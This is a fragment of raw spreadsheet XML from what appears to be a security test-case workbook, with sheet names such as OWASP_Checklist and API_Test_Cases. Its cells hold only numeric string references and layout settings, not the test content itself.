      <c r="F5" s="4" t="s">
        <v>496</v>
      </c>
      <c r="G5" s="4" t="s">
        <v>498</v>
      </c>
      <c r="H5" s="4" t="s">
        <v>497</v>
      </c>
      <c r="I5" s="4" t="s">
        <v>499</v>
      </c>
      <c r="J5" s="4" t="s">
        <v>500</v>
      </c>
    </row>
    <row r="6" spans="1:10" ht="174" customHeight="1">
      <c r="A6" s="5">
        <v>1.1000000000000001</v>
      </c>
      <c r="B6" s="6" t="s">
        <v>1544</v>
      </c>
      <c r="C6" s="6" t="s">
        <v>1545</v>
      </c>
      <c r="D6" s="7" t="s">
        <v>1546</v>
      </c>
      <c r="E6" s="6" t="s">
        <v>1547</v>
      </c>
    </row>
    <row r="7" spans="1:10" ht="150">
      <c r="A7" s="5">
        <v>1.2</v>
      </c>
      <c r="B7" s="5" t="s">
        <v>1544</v>
      </c>
      <c r="C7" s="6" t="s">
        <v>1545</v>
      </c>
      <c r="D7" s="7" t="s">
        <v>1548</v>
      </c>
      <c r="E7" s="5" t="s">
        <v>1547</v>
      </c>
    </row>
    <row r="8" spans="1:10" ht="13">
      <c r="A8" s="119" t="s">
        <v>1549</v>
      </c>
      <c r="B8" s="119"/>
      <c r="C8" s="119"/>
      <c r="D8" s="119"/>
    </row>
    <row r="9" spans="1:10" ht="25">
      <c r="A9" s="4" t="s">
        <v>43</v>
      </c>
      <c r="B9" s="4" t="s">
        <v>492</v>
      </c>
      <c r="C9" s="4" t="s">
        <v>493</v>
      </c>
      <c r="D9" s="4" t="s">
        <v>494</v>
      </c>
      <c r="E9" s="4" t="s">
        <v>495</v>
      </c>
      <c r="F9" s="4" t="s">
        <v>496</v>
      </c>
      <c r="G9" s="4" t="s">
        <v>498</v>
      </c>
      <c r="H9" s="4" t="s">
        <v>497</v>
      </c>
      <c r="I9" s="4" t="s">
        <v>499</v>
      </c>
      <c r="J9" s="4" t="s">
        <v>500</v>
      </c>
    </row>
    <row r="10" spans="1:10" ht="187.5">
      <c r="A10" s="5">
        <v>2.1</v>
      </c>
      <c r="B10" s="5" t="s">
        <v>1550</v>
      </c>
      <c r="C10" s="6" t="s">
        <v>1551</v>
      </c>
      <c r="D10" s="8" t="s">
        <v>1552</v>
      </c>
      <c r="E10" s="5" t="s">
        <v>1553</v>
      </c>
    </row>
    <row r="11" spans="1:10" ht="198" customHeight="1">
      <c r="A11" s="5">
        <v>2.2000000000000002</v>
      </c>
      <c r="B11" s="5" t="s">
        <v>1550</v>
      </c>
      <c r="C11" s="6" t="s">
        <v>1551</v>
      </c>
      <c r="D11" s="6" t="s">
        <v>1554</v>
      </c>
      <c r="E11" s="5" t="s">
        <v>1553</v>
      </c>
    </row>
    <row r="12" spans="1:10" ht="213.75" customHeight="1">
      <c r="A12" s="5">
        <v>2.2999999999999998</v>
      </c>
      <c r="B12" s="5" t="s">
        <v>1555</v>
      </c>
      <c r="C12" s="6" t="s">
        <v>1556</v>
      </c>
      <c r="D12" s="6" t="s">
        <v>1557</v>
      </c>
      <c r="E12" s="5" t="s">
        <v>1558</v>
      </c>
    </row>
    <row r="13" spans="1:10" ht="187.5">
      <c r="A13" s="5">
        <v>2.4</v>
      </c>
      <c r="B13" s="5" t="s">
        <v>1555</v>
      </c>
      <c r="C13" s="6" t="s">
        <v>1556</v>
      </c>
      <c r="D13" s="6" t="s">
        <v>1559</v>
      </c>
      <c r="E13" s="6" t="s">
        <v>1560</v>
      </c>
    </row>
    <row r="14" spans="1:10" ht="12.75" customHeight="1">
      <c r="A14" s="118" t="s">
        <v>1561</v>
      </c>
      <c r="B14" s="118"/>
      <c r="C14" s="118"/>
    </row>
    <row r="15" spans="1:10" ht="150">
      <c r="A15" s="5">
        <v>3.1</v>
      </c>
      <c r="B15" s="5" t="s">
        <v>1562</v>
      </c>
      <c r="C15" s="6" t="s">
        <v>1563</v>
      </c>
      <c r="D15" s="6" t="s">
        <v>1564</v>
      </c>
      <c r="E15" s="6" t="s">
        <v>1565</v>
      </c>
    </row>
    <row r="16" spans="1:10" ht="13">
      <c r="A16" s="120" t="s">
        <v>1566</v>
      </c>
      <c r="B16" s="120"/>
      <c r="C16" s="120"/>
    </row>
    <row r="17" spans="1:10" ht="150">
      <c r="A17" s="5">
        <v>4.0999999999999996</v>
      </c>
      <c r="B17" s="6" t="s">
        <v>1567</v>
      </c>
      <c r="C17" s="6" t="s">
        <v>1568</v>
      </c>
      <c r="D17" s="6" t="s">
        <v>1569</v>
      </c>
      <c r="E17" s="5" t="s">
        <v>1547</v>
      </c>
    </row>
    <row r="18" spans="1:10" ht="200">
      <c r="A18" s="5">
        <v>4.2</v>
      </c>
      <c r="B18" s="6" t="s">
        <v>1570</v>
      </c>
      <c r="C18" s="6" t="s">
        <v>1568</v>
      </c>
      <c r="D18" s="6" t="s">
        <v>1571</v>
      </c>
      <c r="E18" s="5" t="s">
        <v>1547</v>
      </c>
    </row>
    <row r="19" spans="1:10" ht="149.25" customHeight="1">
      <c r="A19" s="5">
        <v>4.3</v>
      </c>
      <c r="B19" s="6" t="s">
        <v>1570</v>
      </c>
      <c r="C19" s="6" t="s">
        <v>1568</v>
      </c>
      <c r="D19" s="6" t="s">
        <v>1572</v>
      </c>
      <c r="E19" s="5" t="s">
        <v>1547</v>
      </c>
    </row>
    <row r="20" spans="1:10" ht="13">
      <c r="A20" s="120" t="s">
        <v>1573</v>
      </c>
      <c r="B20" s="120"/>
      <c r="C20" s="120"/>
    </row>
    <row r="21" spans="1:10" ht="128.25" customHeight="1">
      <c r="A21" s="5">
        <v>5.0999999999999996</v>
      </c>
      <c r="B21" s="6" t="s">
        <v>1574</v>
      </c>
      <c r="C21" s="5" t="s">
        <v>1575</v>
      </c>
      <c r="D21" s="6" t="s">
        <v>1576</v>
      </c>
      <c r="E21" s="6" t="s">
        <v>1577</v>
      </c>
    </row>
    <row r="22" spans="1:10" ht="144" customHeight="1">
      <c r="A22" s="5">
        <v>5.2</v>
      </c>
      <c r="B22" s="6" t="s">
        <v>1574</v>
      </c>
      <c r="C22" s="6" t="s">
        <v>1578</v>
      </c>
      <c r="D22" s="6" t="s">
        <v>1579</v>
      </c>
      <c r="E22" s="6" t="s">
        <v>1577</v>
      </c>
    </row>
    <row r="24" spans="1:10" ht="13">
      <c r="A24" s="120" t="s">
        <v>1580</v>
      </c>
      <c r="B24" s="120"/>
      <c r="C24" s="120"/>
    </row>
    <row r="25" spans="1:10" ht="25">
      <c r="A25" s="4" t="s">
        <v>43</v>
      </c>
      <c r="B25" s="4" t="s">
        <v>492</v>
      </c>
      <c r="C25" s="4" t="s">
        <v>493</v>
      </c>
      <c r="D25" s="4" t="s">
        <v>494</v>
      </c>
      <c r="E25" s="4" t="s">
        <v>495</v>
      </c>
      <c r="F25" s="4" t="s">
        <v>496</v>
      </c>
      <c r="G25" s="4" t="s">
        <v>498</v>
      </c>
      <c r="H25" s="4" t="s">
        <v>497</v>
      </c>
      <c r="I25" s="4" t="s">
        <v>499</v>
      </c>
      <c r="J25" s="4" t="s">
        <v>500</v>
      </c>
    </row>
    <row r="26" spans="1:10" ht="154.5" customHeight="1">
      <c r="A26" s="5">
        <v>6.1</v>
      </c>
      <c r="B26" s="5" t="s">
        <v>1581</v>
      </c>
      <c r="C26" s="6" t="s">
        <v>1582</v>
      </c>
      <c r="D26" s="6" t="s">
        <v>1583</v>
      </c>
      <c r="E26" s="6" t="s">
        <v>1584</v>
      </c>
    </row>
    <row r="27" spans="1:10" ht="158.25" customHeight="1">
      <c r="A27" s="5">
        <v>6.2</v>
      </c>
      <c r="B27" s="5" t="s">
        <v>1585</v>
      </c>
      <c r="C27" s="6" t="s">
        <v>1582</v>
      </c>
      <c r="D27" s="6" t="s">
        <v>1586</v>
      </c>
      <c r="E27" s="6" t="s">
        <v>1584</v>
      </c>
    </row>
    <row r="28" spans="1:10" ht="175">
      <c r="A28" s="5">
        <v>6.3</v>
      </c>
      <c r="B28" s="5" t="s">
        <v>1585</v>
      </c>
      <c r="C28" s="6" t="s">
        <v>1582</v>
      </c>
      <c r="D28" s="6" t="s">
        <v>1587</v>
      </c>
      <c r="E28" s="6" t="s">
        <v>1584</v>
      </c>
    </row>
    <row r="30" spans="1:10" ht="13">
      <c r="A30" s="120" t="s">
        <v>1588</v>
      </c>
      <c r="B30" s="120"/>
      <c r="C30" s="120"/>
    </row>
    <row r="31" spans="1:10" ht="25">
      <c r="A31" s="4" t="s">
        <v>43</v>
      </c>
      <c r="B31" s="4" t="s">
        <v>492</v>
      </c>
      <c r="C31" s="4" t="s">
        <v>493</v>
      </c>
      <c r="D31" s="4" t="s">
        <v>494</v>
      </c>
      <c r="E31" s="4" t="s">
        <v>495</v>
      </c>
      <c r="F31" s="4" t="s">
        <v>496</v>
      </c>
      <c r="G31" s="4" t="s">
        <v>498</v>
      </c>
      <c r="H31" s="4" t="s">
        <v>497</v>
      </c>
      <c r="I31" s="4" t="s">
        <v>499</v>
      </c>
      <c r="J31" s="4" t="s">
        <v>500</v>
      </c>
    </row>
    <row r="32" spans="1:10" ht="160.5" customHeight="1">
      <c r="A32" s="5">
        <v>7.1</v>
      </c>
      <c r="B32" s="5" t="s">
        <v>1589</v>
      </c>
      <c r="C32" s="5" t="s">
        <v>1590</v>
      </c>
      <c r="D32" s="6" t="s">
        <v>1591</v>
      </c>
      <c r="E32" s="6" t="s">
        <v>1592</v>
      </c>
    </row>
    <row r="33" spans="1:10" ht="123" customHeight="1">
      <c r="A33" s="5">
        <v>7.2</v>
      </c>
      <c r="B33" s="5" t="s">
        <v>1589</v>
      </c>
      <c r="C33" s="6" t="s">
        <v>1593</v>
      </c>
      <c r="D33" s="6" t="s">
        <v>1594</v>
      </c>
      <c r="E33" s="6" t="s">
        <v>1595</v>
      </c>
    </row>
    <row r="35" spans="1:10" ht="13">
      <c r="A35" s="120" t="s">
        <v>1596</v>
      </c>
      <c r="B35" s="120"/>
      <c r="C35" s="120"/>
    </row>
    <row r="36" spans="1:10" ht="25">
      <c r="A36" s="4" t="s">
        <v>43</v>
      </c>
      <c r="B36" s="4" t="s">
        <v>492</v>
      </c>
      <c r="C36" s="4" t="s">
        <v>493</v>
      </c>
      <c r="D36" s="4" t="s">
        <v>494</v>
      </c>
      <c r="E36" s="4" t="s">
        <v>495</v>
      </c>
      <c r="F36" s="4" t="s">
        <v>496</v>
      </c>
      <c r="G36" s="4" t="s">
        <v>498</v>
      </c>
      <c r="H36" s="4" t="s">
        <v>497</v>
      </c>
      <c r="I36" s="4" t="s">
        <v>499</v>
      </c>
      <c r="J36" s="4" t="s">
        <v>500</v>
      </c>
    </row>
    <row r="37" spans="1:10" ht="195" customHeight="1">
      <c r="A37" s="5">
        <v>8.1</v>
      </c>
      <c r="B37" s="5" t="s">
        <v>1597</v>
      </c>
      <c r="C37" s="5" t="s">
        <v>1598</v>
      </c>
      <c r="D37" s="6" t="s">
        <v>1599</v>
      </c>
      <c r="E37" s="6" t="s">
        <v>1600</v>
      </c>
    </row>
    <row r="38" spans="1:10" ht="13">
      <c r="A38" s="120" t="s">
        <v>1601</v>
      </c>
      <c r="B38" s="120"/>
      <c r="C38" s="120"/>
    </row>
    <row r="39" spans="1:10" ht="25">
      <c r="A39" s="4" t="s">
        <v>43</v>
      </c>
      <c r="B39" s="4" t="s">
        <v>492</v>
      </c>
      <c r="C39" s="4" t="s">
        <v>493</v>
      </c>
      <c r="D39" s="4" t="s">
        <v>494</v>
      </c>
      <c r="E39" s="4" t="s">
        <v>495</v>
      </c>
      <c r="F39" s="4" t="s">
        <v>496</v>
      </c>
      <c r="G39" s="4" t="s">
        <v>498</v>
      </c>
      <c r="H39" s="4" t="s">
        <v>497</v>
      </c>
      <c r="I39" s="4" t="s">
        <v>499</v>
      </c>
      <c r="J39" s="4" t="s">
        <v>500</v>
      </c>
    </row>
    <row r="40" spans="1:10" ht="135.75" customHeight="1">
      <c r="A40" s="5">
        <v>9.1</v>
      </c>
      <c r="B40" s="5" t="s">
        <v>1602</v>
      </c>
      <c r="C40" s="6" t="s">
        <v>1603</v>
      </c>
      <c r="D40" s="8" t="s">
        <v>1604</v>
      </c>
      <c r="E40" s="6" t="s">
        <v>1605</v>
      </c>
    </row>
    <row r="42" spans="1:10" ht="13">
      <c r="A42" s="120" t="s">
        <v>1606</v>
      </c>
      <c r="B42" s="120"/>
      <c r="C42" s="120"/>
    </row>
    <row r="43" spans="1:10" ht="25">
      <c r="A43" s="4" t="s">
        <v>43</v>
      </c>
      <c r="B43" s="4" t="s">
        <v>492</v>
      </c>
      <c r="C43" s="4" t="s">
        <v>493</v>
      </c>
      <c r="D43" s="4" t="s">
        <v>494</v>
      </c>
      <c r="E43" s="4" t="s">
        <v>495</v>
      </c>
      <c r="F43" s="4" t="s">
        <v>496</v>
      </c>
      <c r="G43" s="4" t="s">
        <v>498</v>
      </c>
      <c r="H43" s="4" t="s">
        <v>497</v>
      </c>
      <c r="I43" s="4" t="s">
        <v>499</v>
      </c>
      <c r="J43" s="4" t="s">
        <v>500</v>
      </c>
    </row>
    <row r="44" spans="1:10" ht="127.5" customHeight="1">
      <c r="A44" s="5">
        <v>10.1</v>
      </c>
      <c r="B44" s="6" t="s">
        <v>1607</v>
      </c>
      <c r="C44" s="5" t="s">
        <v>1608</v>
      </c>
      <c r="D44" s="6" t="s">
        <v>1609</v>
      </c>
      <c r="E44" s="6" t="s">
        <v>1610</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="11">
    <mergeCell ref="A42:C42"/>
    <mergeCell ref="A20:C20"/>
    <mergeCell ref="A24:C24"/>
    <mergeCell ref="A30:C30"/>
    <mergeCell ref="A35:C35"/>
    <mergeCell ref="A38:C38"/>
    <mergeCell ref="A1:C1"/>
    <mergeCell ref="A3:C3"/>
    <mergeCell ref="A8:D8"/>
    <mergeCell ref="A14:C14"/>
    <mergeCell ref="A16:C16"/>
  </mergeCells>
  <pageMargins left="0.7" right="0.7" top="0.3" bottom="0.3" header="0.3" footer="0.3"/>
  <pageSetup orientation="portrait" useFirstPageNumber="1" horizontalDpi="300" verticalDpi="300"/>
  <headerFooter differentFirst="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Security_Test_Category_&amp;_Tools</vt:lpstr>
      <vt:lpstr>Test_Case_Coverage_Status</vt:lpstr>
      <vt:lpstr>OWASP_Checklist</vt:lpstr>
      <vt:lpstr>Tools</vt:lpstr>
      <vt:lpstr>Tier_1</vt:lpstr>
      <vt:lpstr>Tier_2</vt:lpstr>
      <vt:lpstr>Android_Mobile_Tests</vt:lpstr>
      <vt:lpstr>iOS_Mobile_Tests</vt:lpstr>
      <vt:lpstr>API_Test_Cases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Nimmagadda Sai</dc:creator>
  <cp:lastModifiedBy>Krishna, Nimmagadda Sai</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-06-22T12:28:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-30T09:12:25Z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1033-11.2.0.11191</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ICV">
    <vt:lpwstr>33C53706A8324E239231136213CFF00C</vt:lpwstr>
  </property>
</Properties>
</file>